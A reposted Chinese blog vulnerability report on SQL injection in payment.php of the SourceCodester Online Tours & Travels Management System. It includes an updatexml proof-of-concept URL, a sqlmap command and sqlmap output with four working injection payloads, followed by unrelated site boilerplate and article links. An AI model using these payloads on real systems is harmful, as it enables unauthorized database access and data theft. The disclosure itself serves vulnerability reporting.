SourceCodester Online Tours & Travels Management System payment.php sql injection

这篇具有很好参考价值的文章主要介绍了SourceCodester Online Tours & Travels Management System payment.php sql injection。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

path: admin/operations/payment.php

Abstract:

Line 43 of payment.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.

Explanation:

SQL injection errors occur when:

  1. Data enters a program from an untrusted source.

  2. The data is used to dynamically construct a SQL query.

In this case, the data is passed to exec() in payment.php on line 43.

SourceCodester Online Tours & Travels Management System payment.php sql injection,php,sql,开发语言
SourceCodester Online Tours & Travels Management System payment.php sql injection,php,sql,开发语言

http://127.0.0.1/OTMSP-Final-source-code/sourcecode/tour/admin/operations/payment.php?id=1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

SourceCodester Online Tours & Travels Management System payment.php sql injection,php,sql,开发语言

sqlmap.py -r sql.txt

SourceCodester Online Tours & Travels Management System payment.php sql injection,php,sql,开发语言
SourceCodester Online Tours & Travels Management System payment.php sql injection,php,sql,开发语言

sqlmap identified the following injection point(s) with a total of 1090 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1' RLIKE (SELECT (CASE WHEN (9940=9940) THEN 1 ELSE 0x28 END))-- FVhh

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1' AND GTID_SUBSET(CONCAT(0x7170787671,(SELECT (ELT(5607=5607,1))),0x716b6a6b71),5607)-- hjwK

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=1';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
    Payload: id=1' AND 9264=BENCHMARK(5000000,MD5(0x4d5a4c7a))-- vYxx
---
Download Code:

https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html文章来源地址https://www.toymoban.com/news/detail-827472.html

到了这里,关于SourceCodester Online Tours & Travels Management System payment.php sql injection的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【软件安装】Web Tours的安装与启动

    1、下载,地址:https://marketplace.microfocus.com/appdelivery/content/web-tours-sample-application#app_releases 2、安装,下载完成后,解压,安装应用程序:strawberry-perl-5.10.1.0 3、启动服务,下载的zip:Web Tours 1.0,解压后解压文件夹中存在zip包:WebTours,再次解压,双击StartServer文件启动服务 4、

    2024年02月04日
    浏览(32)
  • 从NetSuite Payment Link杂谈财务自动化、数字化转型

    最近在进行信息化的理论学习,让我有机会跳开软件功能,用更加宏大的视野,来审视我们在哪里,我们要到哪去。 在过去20多年,我们的财务软件经历了电算化、网络化、目前处于自动化、智能化阶段。从NetSuite这几年的功能发展来看,印证了这个趋势。 可以看到的落地应

    2024年02月05日
    浏览(46)
  • [BUUCTF 2018]Online Tool

    打开题目就是源码,审一下。  escapeshellarg  — 把字符串转码为可以在 shell 命令里使用的参数 功能  :escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,shell 函数包含 exec(), system() 执行运

    2024年02月02日
    浏览(35)
  • Microsoft Project Online部署方案

    目录 一、前言 二、Microsoft Project Online简介 三、Microsoft Project Online的优势 1、云端部署

    2024年02月10日
    浏览(29)
  • 1111 Online Map (PAT甲级)

    这道题我读题不仔细导致踩了个大坑,一个测试点过不了卡了好几个小时:第二个dijkstra算法中,题目要求是“In case the fastest path is not unique, output the one that passes through the fewest intersections”,我却想当然地认为在fastest path is not unique的时候,判断标准是最短距离…… Input our

    2024年02月07日
    浏览(41)
  • GOT Online|解密游戏性能优化秘籍

    随着UWA GOT Online功能的不断迭代,GOT Online为解决各种游戏性能问题(如内存占用、CPU耗时、GPU耗时和卡顿)提供了丰富的高效、准确且便捷的数据获取方式和分析建议。本文总结了GOT Online(SDK 2.4.7版本)中的关键优化要点,涵盖了数据获取、数据分析和性能优化等方面。不论

    2024年02月16日
    浏览(41)
  • 无涯教程-Android Online Test函数

    Android在线测试模拟了真正的在线认证考试。您将看到基于 Android概念的多项选择题(MCQ),将为您提供四个options。您将为该问题选择最合适的答案,然后继续进行下一个问题,而不会浪费时间。完成完整的考试后,您将获得在线考试分数。 总问题数-20 最长时间-20分钟 Start Test Androi

    2024年02月10日
    浏览(37)
  • Sharepoint Online手工迁移方案 | 分享二

    目录 前言 1.创建新的目标网站集合 2.备份旧网站集合的内容数据库 3.卸载旧网站集合

    2023年04月09日
    浏览(31)
  • Microsoft Exchange Online Protection部署方案

    目录 第一章:前言 第二章:环境规划 第三章:设置Exchange Online Protection 3.1 注册EOP服务

    2024年02月01日
    浏览(29)
  • Helm Deploy Online Rancher Demo

    Rancher 是一个开源的企业级全栈化容器部署及管理平台。已有超过 1900 万次下载,4000+ 生产环境的应用。 简单的说,就是一个可以让你通过 web 界面管理 docker 容器的平台。定位上和 K8s 比较接近,都是通过 web 界面赋予完全的 docker 服务编排功能。 特色: 平台部署方便。管理

    2024年02月09日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包